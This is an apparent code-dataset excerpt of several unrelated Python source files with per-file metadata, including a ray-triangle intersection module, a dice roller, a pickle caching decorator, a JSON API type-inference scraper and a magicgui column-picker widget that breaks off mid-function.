| 30.30303 | 118 | 0.640333 | 426 | 3,000 | 4.316901 | 0.293427 | 0.078303 | 0.045677 | 0.039152 | 0.434475 | 0.426862 | 0.371398 | 0.371398 | 0.349103 | 0.316476 | 0 | 0.011146 | 0.252333 | 3,000 | 98 | 119 | 30.612245 | 0.808738 | 0.071333 | 0 | 0.378788 | 0 | 0.015152 | 0.117071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.045455 | 0 | 0.287879 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8ac78399e840a9f4584fc74b5d093c38c0fc44 | 265 | py | Python | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 77 | 2015-01-03T20:26:28.000Z | 2021-07-07T15:08:25.000Z | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:42:31.000Z | 2021-06-10T23:42:31.000Z | lastrender/settings.py | jc855/lastgraph | a2917e73f0e0b9409e897e4a83944e72161a33ce | [
"BSD-3-Clause"
] | 20 | 2015-01-17T16:33:41.000Z | 2021-12-23T03:40:36.000Z | import os
static_path = os.path.join(os.path.dirname(__file__), "..", "static")
apiurl = "http://localhost:8000/api/%s"
local_store = os.path.join(static_path, "graphs")
local_store_url = "http://localhost:8000/static/graphs"
nodename = "lg"
nodepwd = "lg@home"
| 24.090909 | 69 | 0.709434 | 39 | 265 | 4.589744 | 0.538462 | 0.100559 | 0.111732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033473 | 0.098113 | 265 | 10 | 70 | 26.5 | 0.715481 | 0 | 0 | 0 | 0 | 0 | 0.324528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8b609df5d78fd1e3a458dac9a51ed8f9a19335 | 952 | py | Python | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | src/omnis/structure_nodes/loop.py | rodrigogomesantos/omnis | a6f59c870d86c112f26a5b98c31889d64eea39eb | [
"MIT"
] | null | null | null | class loop():
def __init__(self, _loop_type, **kwargs) -> None:
self.type = _loop_type
self.kwargs = kwargs
self.break_function = self.kwargs.get("break_function")
self.range = kwargs.get("range")
self.start = getattr(self, f"_{self.type}")
self.counter = 0
self.outPut_function = 0
def _while(self, function, *ags, **kws):
while not self.break_function():
self.counter = 0
while not self.pause_function():
self.outPut_function = function(*ags, **kws)
self.counter+=1
return self.counter, self.outPut_function
def _for(self, function, *args, **kwargs):
self.counter = 0
for _c_ in self.range:
self.outPut_function = function(*args, **kwargs)
self.counter = _c_
return self.counter, self.outPut_function
def break_verify(self):
self.break_function() | 35.259259 | 63 | 0.590336 | 113 | 952 | 4.743363 | 0.265487 | 0.143657 | 0.16791 | 0.078358 | 0.25 | 0.141791 | 0.141791 | 0 | 0 | 0 | 0 | 0.00744 | 0.294118 | 952 | 27 | 64 | 35.259259 | 0.790179 | 0 | 0 | 0.208333 | 0 | 0 | 0.032529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8bc66edbc27feb19c1a24e01f7065d5f4aedb0 | 4,646 | py | Python | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | 1 | 2020-09-17T16:41:34.000Z | 2020-09-17T16:41:34.000Z | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | null | null | null | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | null | null | null | import sys
import numpy as np
#############################################################
### ###
### Module for Python3 ###
### * Using Numpy ( + Cupy ? ) ###
### ###
#############################################################
class RayTriangleIntersection():
### https://pheema.hatenablog.jp/entry/ray-triangle-intersection
def __init__(self):
pass
def calc_intersection(self, o, d, v0, v1, v2):
e1 = np.subtract(v1, v0)
e2 = np.subtract(v2, v0)
### https://www.it-swarm.dev/ja/python/python-numpy-machine-epsilon/1041749812/
kEpsilon = np.finfo(float).eps
alpha = np.cross(d, e2)
# det = np.dot(e1, alpha)
det = np.sum(e1 * alpha, axis=1)
# print("e1.shape : {}".format(e1.shape))
# print("e2.shape : {}".format(e2.shape))
# print("alpha.shape : {}".format(alpha.shape))
# print("det.shape : {}".format(det.shape))
# intersect_count = np.count_nonzero(det)
### True = InterSection
### (1) Check Parallel
bool_p = (-kEpsilon > det) | (det > kEpsilon)
### Remove (1)
v0 = v0[bool_p]
v1 = v1[bool_p]
v2 = v2[bool_p]
e1 = e1[bool_p]
e2 = e2[bool_p]
alpha = alpha[bool_p]
det = det[bool_p]
# print("det.shape (1) : {}".format(det.shape))
det_inv = 1.0 / det
r = np.subtract(o, v0)
### (2) Check u-Value in the Domain (0 <= u <= 1)
# u = np.dot(alpha, r) * det_inv
u = np.sum(alpha * r, axis=1) * det_inv
bool_u = (0.0 < u) & (u < 1.0)
### Remove (2)
v0 = v0[bool_u]
v1 = v1[bool_u]
v2 = v2[bool_u]
e1 = e1[bool_u]
e2 = e2[bool_u]
alpha = alpha[bool_u]
r = r[bool_u]
u = u[bool_u]
det = det[bool_u]
det_inv = det_inv[bool_u]
# print("det.shape (2) : {}".format(det.shape))
beta = np.cross(r, e1)
### (3) Check v-Value in the Domain (0 <= v <= 1)
### and
### Check (u + v = 1)
# v = np.dot(d, beta) * det_inv
v = np.sum(d * beta, axis=1) * det_inv
bool_v = (0.0 < v) & (u + v < 1.0)
### Remove (3)
v0 = v0[bool_v]
v1 = v1[bool_v]
v2 = v2[bool_v]
e1 = e1[bool_v]
e2 = e2[bool_v]
alpha = alpha[bool_v]
beta = beta[bool_v]
r = r[bool_v]
u = u[bool_v]
v = v[bool_v]
det = det[bool_v]
det_inv = det_inv[bool_v]
# print("det.shape (3) : {}".format(det.shape))
### (4) Check t_value (t >= 0)
# t = np.dot(e2, beta) * det_inv
t = np.sum(e2 * beta, axis=1) * det_inv
bool_t = 0.0 < t
### Remove (4)
v0 = v0[bool_t]
v1 = v1[bool_t]
v2 = v2[bool_t]
e1 = e1[bool_t]
e2 = e2[bool_t]
alpha = alpha[bool_t]
beta = beta[bool_t]
r = r[bool_t]
t = t[bool_t]
u = u[bool_t]
v = v[bool_t]
det = det[bool_t]
det_inv = det_inv[bool_t]
# print("det.shape (4) : {}".format(det.shape))
### Intersett : True !!
# intersect_val = [t, u, v]
### Barycenrinc_Coordinate >> XYZ
### ((1 - u - v) * v0) + (u * v1) + (v * v2)
new_amp = 1.0 - u - v
new_v0 = np.multiply(v0, new_amp[:, np.newaxis])
new_v1 = np.multiply(v1, u[:, np.newaxis])
new_v2 = np.multiply(v2, v[:, np.newaxis])
intersect_pos = np.add(np.add(new_v0, new_v1), new_v2)
ray_line = np.subtract(intersect_pos, o)
# print("ray_line.shape : {}".format(ray_line.shape))
### (5) Check Line-Triangle Intersection
### Compare Length, Line-Length / Origin-IntersectPoint-Length
line_length = np.linalg.norm(d)
intersect_length = np.linalg.norm(ray_line, axis=1)
# print("line_len : {}".format(line_length))
# print("inter_len : {}".format(intersect_length))
# print("inter_len.shape : {}".format(intersect_length.shape))
bool_l = intersect_length < line_length
# print(bool_l)
intersect_count = np.count_nonzero(bool_l)
return intersect_count | 30.168831 | 88 | 0.44619 | 588 | 4,646 | 3.357143 | 0.17517 | 0.035461 | 0.030395 | 0.016717 | 0.096758 | 0.01925 | 0 | 0 | 0 | 0 | 0 | 0.042479 | 0.381834 | 4,646 | 154 | 89 | 30.168831 | 0.644847 | 0.314895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.013514 | 0.027027 | 0 | 0.081081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8c088d3edb685bf729a71250bfe8e5e7bfb65d | 2,046 | py | Python | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | class DieRoll(object):
"""Roll object that parses roll string and calls appropriate function."""
def __init__(self, roll_str, flag):
"""Initialize Die roll object by breaking apart roll string."""
valid_flags = {
"a": self.advantage,
"d": self.disadvantage
}
self.roll_str = roll = roll_str
self.operator = "+"
self.action = valid_flags[flag] if flag else self.roll_die
self.modifier = 0
self.message = ""
valid_operators = ["+", "-"]
for o in valid_operators:
if o in roll:
self.operator = o
roll, mod = roll.split(o)
self.modifier = int(mod) * -1 if o == "-" else int(mod)
self.number, self.sides = map(int, roll.split("d"))
self.min_roll = self.number
self.max_roll = self.sides * self.number
def print_results(self, roll_result, name=None):
"""Return result of roll."""
roll_plus_mods = "{} {} {}".format(
roll_result,
self.operator,
abs(self.modifier)
)
final_result = "*[ {} ]* _({} = {}) (min {}, max {}) {}_".format(
roll_result + self.modifier,
self.roll_str,
roll_plus_mods,
self.min_roll + self.modifier,
self.max_roll + self.modifier,
self.message
)
if name:
final_result += " with {}".format(name)
return final_result
def roll_die(self):
"""Standard roll of die."""
import random
result = 0
for x in range(0, self.number):
result += random.randint(1, self.sides)
return result
def advantage(self):
"""Roll with advantage."""
self.message = "with advantage"
return max(self.roll_die(), self.roll_die())
def disadvantage(self):
"""Roll with disadvantage."""
self.message = "with disadvantage"
return min(self.roll_die(), self.roll_die())
| 31.476923 | 77 | 0.535679 | 233 | 2,046 | 4.553648 | 0.283262 | 0.082941 | 0.051838 | 0.042413 | 0.04147 | 0.04147 | 0 | 0 | 0 | 0 | 0 | 0.003693 | 0.338221 | 2,046 | 64 | 78 | 31.96875 | 0.779911 | 0.105083 | 0 | 0 | 0 | 0 | 0.052222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0 | 0.020408 | 0 | 0.22449 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8d954a7e320b872b94573d4e171b827ee4d202 | 1,099 | py | Python | src/utils/load_or_make.py | jlehnersd/metis_project2 | 0bde762c43c4cf9aa5c6672b894e704803616aa3 | [
"MIT"
] | 16 | 2019-04-08T22:09:51.000Z | 2021-08-02T18:18:41.000Z | src/utils/load_or_make.py | jlehnersd/metis_project2 | 0bde762c43c4cf9aa5c6672b894e704803616aa3 | [
"MIT"
] | 1 | 2019-11-19T06:27:37.000Z | 2019-12-26T20:56:03.000Z | src/utils/load_or_make.py | floraxinru/metisproject04 | 80ee97eedbf675d6f5064eb92fd7166b56bb81e6 | [
"MIT"
] | 8 | 2019-04-08T23:01:39.000Z | 2021-08-02T18:18:43.000Z |
import os, pickle
import functools
def load_or_make(creator):
"""
Loads data that is pickled at filepath if filepath exists;
otherwise, calls creator(*args, **kwargs) to create the data
and pickle it at filepath.
Returns the data in either case.
Inputs:
- filepath: path to where data is / should be stored
- creator: function to create data if it is not already pickled
- *args, **kwargs: arguments passed to creator()
Outputs:
- item: the data that is stored at filepath
Usage:
@load_or_make
def data_creator(args):
# code
# return data
my_data = data_creator(save_file_path, *args, **kwargs)
"""
@functools.wraps(creator)
def cached_creator(filepath, *args, **kwargs):
if os.path.isfile(filepath):
with open(filepath, 'rb') as pkl:
item = pickle.load(pkl)
else:
item = creator(*args, **kwargs)
with open(filepath, 'wb') as pkl:
pickle.dump(item, pkl)
return item
return cached_creator
| 28.179487 | 67 | 0.606915 | 140 | 1,099 | 4.685714 | 0.435714 | 0.07622 | 0.030488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.304823 | 1,099 | 38 | 68 | 28.921053 | 0.858639 | 0.495905 | 0 | 0 | 0 | 0 | 0.008677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8f2cd4383b58674dc6f3bff361444a5618a257 | 13,075 | py | Python | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | 3 | 2021-02-05T08:30:40.000Z | 2021-02-05T11:33:16.000Z | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | null | null | null | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | null | null | null | from os import replace
from typing import List, Dict, Any, Callable
import os
import re
import json
import functools
ST_UNKNOWN = "*"
ST_BOOL = "bool"
ST_INT = "integer"
ST_STR = "string"
ST_FLOAT = "float"
ST_URL = "url"
ST_DATETIME = "datetime"
REGEXP_URL = re.compile('^https?://.+$')
REGEXP_DATE = re.compile('^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z$')
class TypeBase:
@property
def isLeaf(self) -> bool:
return True
class NullType(TypeBase):
def __repr__(self) -> str:
return 'null'
class UniTypeHolder(TypeBase):
def __init__(self, vtype: TypeBase) -> None:
assert(type(vtype) != NullType)
self._type = vtype
@property
def type(self) -> TypeBase:
return self._type
def replaceWithCommonObject(self, commonObject: 'CommonObjectType'):
self._type = commonObject
@property
def isLeaf(self) -> bool:
if self._type is None:
return False
return self._type.isLeaf
class Nullable(UniTypeHolder):
def __repr__(self) -> str:
return str(self._type) + '?'
class ValueType(TypeBase):
def __init__(self, typename: str) -> None:
assert(type(typename) == str)
self.__typename = typename
def __eq__(self, other):
return type(other) == ValueType and self.__typename == other.__typename
def __repr__(self) -> str:
return '"' + self.__typename + '"'
@property
def typename(self):
return self.__typename
class ArrayType(UniTypeHolder):
def __repr__(self) -> str:
return '[' + str(self._type) + ']' if self._type is not None else '[]'
class ObjectType(TypeBase):
def __init__(self, props) -> None:
assert(type(props) == dict)
self.__props = props
@property
def isLeaf(self) -> bool:
return False
@property
def isPlain(self):
return all(map(lambda e: e.isLeaf, self.__props.values()))
def get(self, v):
return self.__props.get(v, None)
def keys(self):
return self.__props.keys()
def items(self):
return self.__props.items()
def __repr__(self) -> str:
return '{' + ','.join(['"%s":%s' % (k,str(v)) for (k,v) in self.__props.items()]) + '}'
@property
def numOfKeys(self):
return len(list(self.keys()))
def hasSameKeysOf(self, other) -> bool:
assert(type(other) == ObjectType)
return set(self.keys()) == set(other.keys())
def containsAllKeysOf(self, other) -> bool:
assert(type(other) == ObjectType)
return set(self.keys()).issuperset(set(other.keys()))
def replaceWithCommonObject(self, key, commonObject: 'CommonObjectType'):
self.__props[key] = commonObject
class CommonObjectType(TypeBase):
def __init__(self, typename, object: ObjectType) -> None:
assert(type(object) == ObjectType)
self.__typename = typename
self.__object = object
def __repr__(self) -> str:
return '"$' + self.__typename + '"'
@property
def typename(self):
return self.__typename
@property
def object(self):
return self.__object
def __guessTypeForValue(v):
assert(type(v) != dict and type(v) != list)
if type(v) == type(None): return NullType()
typemap = {
bool: ST_BOOL,
int: ST_INT,
str: ST_STR,
float: ST_FLOAT
}
vtype = typemap.get(type(v), NullType())
if type(vtype) == NullType:
return NullType()
if vtype == ST_STR:
if v.find('http://') == 0 or v.find('https://') == 0:
if v.find('{') == -1: # FIXME ???
return ValueType(ST_URL)
if REGEXP_DATE.match(v):
return ValueType(ST_DATETIME)
return ValueType(vtype)
def __guessTypeForArray(json) -> ArrayType:
assert(type(json) == list)
def aggregateArrayOfObjectType(array):
keys = functools.reduce(lambda a, e: a.union(set(e.keys())), array, set())
if len(keys) == 0:
return ArrayType(None)
merged = {}
for obj in array:
for key in keys:
value = obj.get(key)
if type(value) == ObjectType:
merged[key] = value
#elif type(value) == ArrayType:
# merged[key] = aggregateArrayOfObjectType(value)
elif key in merged:
if type(merged[key]) == NullType and type(value) == NullType:
pass
elif type(merged[key]) == ObjectType and type(value) == NullType:
merged[key] = Nullable(merged[key])
elif type(merged[key]) == NullType and type(value) == ObjectType:
merged[key] = Nullable(value)
elif type(merged[key]) == type(value) and type(value) == ValueType and merged[key] == value:
pass
else:
pass
#merged[key] = merged[key].union(value)
else:
merged[key] = value
return ArrayType(ObjectType(merged))
if all([type(i) == dict for i in json]):
arr = [__guessTypeForDict(i) for i in json]
return aggregateArrayOfObjectType(arr)
types = functools.reduce(lambda a, e: a.union(set([type(e)])), json, set())
if len(types) == 1:
return ArrayType(__guessTypeForValue(json[0]))
assert(False)
def __guessTypeForDict(json) -> ObjectType:
assert(type(json) == dict)
return ObjectType({k:guessType(v) for (k,v) in json.items()})
def guessType(value) -> TypeBase:
if type(value) == dict:
return __guessTypeForDict(value)
elif type(value) == list:
return __guessTypeForArray(value)
else:
return __guessTypeForValue(value)
def collectNonNestedObjects(obj: TypeBase, path: str = '', collected_map: Dict[str, TypeBase] = dict()) -> Dict[str, TypeBase]:
if obj.isLeaf:
return collected_map
if obj.isPlain:
collected_map[path] = obj
return collected_map
assert(type(obj) == ObjectType)
for key, value in obj.items():
if type(value) == Nullable and type(value.type) == ObjectType:
collectNonNestedObjects(value.type, path + '/' + key + '?', collected_map)
elif type(value) == ObjectType:
collectNonNestedObjects(value, path + '/' + key, collected_map)
elif type(value) == ArrayType and type(value.type) == ObjectType:
collectNonNestedObjects(value.type, path + '/' + key + '/0', collected_map)
return collected_map
def exactMatch(a: ObjectType, b: ObjectType):
return a.numOfKeys > 0 and a.isPlain and a.hasSameKeysOf(b)
def similarMatch(a: ObjectType, b: ObjectType):
return a.numOfKeys > 0 and a.isPlain and a.containsAllKeysOf(b) and a.numOfKeys > 3
def bothMatch(a: ObjectType, b: ObjectType):
return exactMatch(a, b) or similarMatch(a, b)
class Endpoint:
def __init__(self, request: Dict, response: TypeBase, rawResponse: str) -> None:
self.__request = request
self.__response = response
self.__rawResponse = rawResponse
@property
def request(self):
return self.__request
@property
def response(self):
return self.__response
@property
def rawResponse(self):
return self.__rawResponse
def replaceWithCommonObject(self, commonObject: CommonObjectType):
cond = lambda v: bothMatch(commonObject.object, v)
def visitObject(obj: TypeBase):
if obj.isLeaf:
return 0
if type(obj) != ObjectType:
return 0
assert(type(obj) == ObjectType)
replaceCount = 0
for key, value in obj.items():
#print(' ', value)
if type(value) == ObjectType:
if cond(value):
replaceCount += 1
obj.replaceWithCommonObject(key, commonObject)
elif not value.isPlain:
replaceCount += visitObject(value)
elif type(value) == ArrayType and type(value.type) == ObjectType:
if cond(value.type):
replaceCount += 1
value.replaceWithCommonObject(commonObject)
else:
replaceCount += visitObject(value.type)
elif type(value) == Nullable and type(value.type) == ObjectType:
if cond(value.type):
replaceCount += 1
value.replaceWithCommonObject(commonObject)
else:
replaceCount += visitObject(value.type)
return replaceCount
#print('>>>>', self.__request['name'])
replaceCount = 0
if type(self.__response) == ObjectType and cond(self.__response):
replaceCount = 1
self.__response = commonObject
else:
replaceCount = visitObject(self.__response)
return replaceCount
def nonNextedResponseObjects(self) -> Dict[str, TypeBase]:
def resolveTypename(path):
n = [e for e in path.split('/') if not e.isdigit()][-1]
if len(n) == 0:
return self.__request['name'] + 'Response'
return n if n[-1] != '?' else n[:-1]
if self.__response is None:
return None
if type(self.__response) == ArrayType:
return None
d = collectNonNestedObjects(self.__response, '', dict())
return {resolveTypename(k):v for (k,v) in d.items() if len(v.keys()) > 0}
def __repr__(self) -> str:
return '%s = %s' % (self.__request['name'], self.__response)
class API:
def __init__(self, endpoints: List[Endpoint] = []) -> None:
self.__endpoints = endpoints
self.__commonObjects = []
def endpoints(self) -> List[Endpoint]:
return self.__endpoints
def commonObjects(self) -> List[CommonObjectType]:
return self.__commonObjects
def __resolveTypename(self, typenameCanditates: List[str]):
exists = lambda name: any(filter(lambda e: e.typename == name, self.__commonObjects))
def rename(name):
for i in range(26):
newTypename = name + chr(ord('A') + i) + 'xx'
if not exists(newTypename):
return newTypename
assert('Temporary typename exhausted' and False)
filteredTypenameCanditates = sorted([e for e in typenameCanditates if len(e) > 0], key=functools.cmp_to_key(lambda a,b:len(a) - len(b)))
typename = filteredTypenameCanditates[0]
cappedTypename = typename[0].upper() + typename[1:]
return rename(cappedTypename) if exists(cappedTypename) else cappedTypename
def findAndRegisterSimilarObjects(self):
def findSimilarObject(objects: List[ObjectType], matchFunction: Callable[[ObjectType, ObjectType], bool]) -> CommonObjectType:
for (_, obj) in objects:
if any(filter(lambda e: matchFunction(e.object, obj), self.__commonObjects)): continue
typenameCanditates = [n for (n,o) in objects if matchFunction(obj, o)]
if len(typenameCanditates) >= 2:
return CommonObjectType(self.__resolveTypename(typenameCanditates), obj)
return None
for i in range(100000):
#nonNestedObjects = functools.reduce(lambda a, e: a + list(e.nonNextedResponseObjects().items()), self.__endpoints, [])
nonNestedObjects = []
for e in self.__endpoints:
objs = e.nonNextedResponseObjects()
if objs is None:
continue
nonNestedObjects += objs.items()
sot = findSimilarObject(nonNestedObjects, exactMatch) or findSimilarObject(nonNestedObjects, similarMatch)
if sot is None:
break
self.__commonObjects.append(sot)
for e in self.__endpoints:
e.replaceWithCommonObject(sot)
@staticmethod
def initWithDir(dir: str, lang: str):
endpoints = []
#for d in ['get-message.json', 'get-messages.json']: #os.listdir(os.path.join(dir, 'api')):
path = os.path.join(dir, 'api', lang)
for d in os.listdir(path):
with open(os.path.join(path, d)) as req:
req_json = json.load(req)
res_text = None
res_json = None
try:
with open(os.path.join(dir, 'response', d)) as res:
res_text = ''.join(res.readlines())
res_json = json.loads(res_text)
except (OSError, IOError) as e:
pass # when reponse file doesn't exist
endpoint = Endpoint(req_json, guessType(res_json), res_text)
endpoints.append(endpoint)
return API(endpoints)
| 36.218837 | 144 | 0.578356 | 1,399 | 13,075 | 5.255897 | 0.137956 | 0.023256 | 0.015232 | 0.013328 | 0.241398 | 0.166191 | 0.148783 | 0.133823 | 0.120495 | 0.102543 | 0 | 0.004619 | 0.304551 | 13,075 | 360 | 145 | 36.319444 | 0.804025 | 0.032352 | 0 | 0.255814 | 0 | 0.003322 | 0.018195 | 0.003006 | 0 | 0 | 0 | 0.002778 | 0.043189 | 1 | 0.17608 | false | 0.013289 | 0.019934 | 0.089701 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8fa3cd904b0121303ce6cd660e368b0933349e | 393 | py | Python | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | null | null | null | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | null | null | null | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | 1 | 2016-01-27T13:37:09.000Z | 2016-01-27T13:37:09.000Z | from setuptools import setup
from platform import system
SYSTEM = system()
VERSION = '1.0.2'
if SYSTEM == 'Windows':
scripts = ['grebot/grebot.bat']
else:
scripts = ['grebot/grebot.sh']
setup(
name='grebot',
version=VERSION,
packages=['grebot'],
license='MIT',
long_description=open('README.txt').read(),
scripts=scripts,
install_requires=['colorama']
)
| 18.714286 | 47 | 0.653944 | 46 | 393 | 5.543478 | 0.652174 | 0.094118 | 0.14902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009375 | 0.185751 | 393 | 20 | 48 | 19.65 | 0.7875 | 0 | 0 | 0 | 0 | 0 | 0.198473 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e90005a1d37aeec86aa49ac6b0e7b616e3410f4 | 3,774 | py | Python | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | 2 | 2022-02-22T14:24:38.000Z | 2022-02-26T13:33:25.000Z | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | null | null | null | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | null | null | null | import operator
from magicgui import magicgui
OPERATOR_DICTIONARY = {
"Divide": (operator.truediv, "Measurement_Ratio"),
"Multiply": (operator.mul, "Measurement_Product"),
"Add": (operator.add, "Measurement_Sum"),
"Subtract": (operator.sub, "Measurement_Difference"),
}
measurement_math_options = list(OPERATOR_DICTIONARY.keys())
measurement_math_options.append("None")
@magicgui(
call_button="Set Options",
position={
"choices": ["upper_right", "upper_left", "lower_right", "lower_left", "center"]
},
size={"min": 0, "max": 1000},
x_shift={"min": -1000, "max": 1000},
y_shift={"min": -1000, "max": 1000},
)
def timestamp_options(
start_time=0,
step_time=1,
prefix="T =",
suffix="frame",
position="upper_left",
size=12,
x_shift=12,
y_shift=0,
):
"""
Widget to choose timestamp options from when called
"""
timestamp_options.close()
# used as a callback function in main widget file
def show_timestamp_options():
timestamp_options.show()
@magicgui(
call_button=False,
Ok={"widget_type": "PushButton", "tooltip": "Press to load data"},
frame={
"choices": ["None"],
"label": "Frame Column:",
"tooltip": "Select frame column in input data",
},
track_id={
"choices": ["None"],
"label": "Object id Column:",
"tooltip": "Select column representing object track ids in input data", # noqa: E501
},
x_coordinates={
"choices": ["None"],
"label": "X Coordinate Column:",
"tooltip": "Select x coordinate column in input data",
},
y_coordinates={
"choices": ["None"],
"label": "Y Coordinate Column:",
"tooltip": "Select y coordinate column in input data",
},
z_coordinates={
"choices": ["None"],
"label": "Z Coordinate Column:",
"tooltip": "Select z coordinate column in input data, select None if column does not exist", # noqa: E501
},
measurment={
"choices": ["None"],
"label": "Measurement Column:",
"tooltip": "Select measurement column in input data",
},
field_of_view_id={
"choices": ["None"],
"label": "Field of View/Position Column:",
"tooltip": "Select fov column in input data, select None if column does not exist", # noqa: E501
},
additional_filter={
"choices": ["None"],
"label": "Additional Filter Column:",
"tooltip": "Select additional filter column, for example Well of a wellplate, select None if column does not exist", # noqa: E501
},
second_measurment={
"choices": ["None"],
"label": "Second Measurement Column:",
"visible": False,
"tooltip": "Select second measurement",
},
measurement_math={
"widget_type": "RadioButtons",
"orientation": "horizontal",
"choices": measurement_math_options,
"label": "Math on first and \n second measurement:",
"tooltip": "Choose operation to calculate the measurment to be used in arcos calculation on first and second measurement", # noqa: E501
},
)
def columnpicker(
frame="None",
track_id="None",
x_coordinates="None",
y_coordinates="None",
z_coordinates="None",
measurment="None",
second_measurment="None",
field_of_view_id="None",
additional_filter="None",
measurement_math="None",
Ok=False,
):
"""Dialog with magicgui for selecting columns"""
columnpicker.Ok.bind(not Ok)
def toggle_visible_second_measurment():
curr_value = columnpicker.measurement_math.value
if curr_value in ["None", "1/X"]:
